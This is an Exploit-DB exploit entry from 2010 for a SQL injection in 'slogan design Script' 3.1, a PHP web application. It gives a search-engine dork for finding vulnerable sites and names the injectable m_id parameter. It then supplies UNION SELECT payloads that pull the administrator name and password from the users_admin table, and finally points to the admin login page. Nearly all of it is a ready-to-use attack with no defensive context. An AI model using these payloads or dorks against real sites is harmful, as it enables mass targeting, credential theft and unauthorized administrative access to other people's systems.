slogan design Script SQL Injection Vulnerability

2010-06-03T00:00:00
ID EDB-ID:12849
Type exploitdb
Reporter Mr.P3rfekT
Modified 2010-06-03T00:00:00

Description

slogan design Script SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            Title: slogan design Script SQL Injection Vulnerability
# Version:
3.1
# Author: Mr.P3rfekT
# Software Site:
http://www.slogandesign.co.il
# Tested on Lunix
# CVE : N/A

###############
Founded By Mr.P3rfekT --- We Will Not Go Down ###############

#
Dork : " inurl:"index.php?m_id="

# Helllo Allz.


#
Exploit :

http://[site]/path/index.php?m_id={SQLi}



#
Poc Username:

union select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Poc Password:

union select
1,2,3,4,5,6,7,8,pass,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin


# Demo:

http://[site]/union
select
1,2,3,4,5,6,7,8,name,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
from users_admin

# Admin Login


#
http://[site]/admin/login.php

# ./done.


####################################################################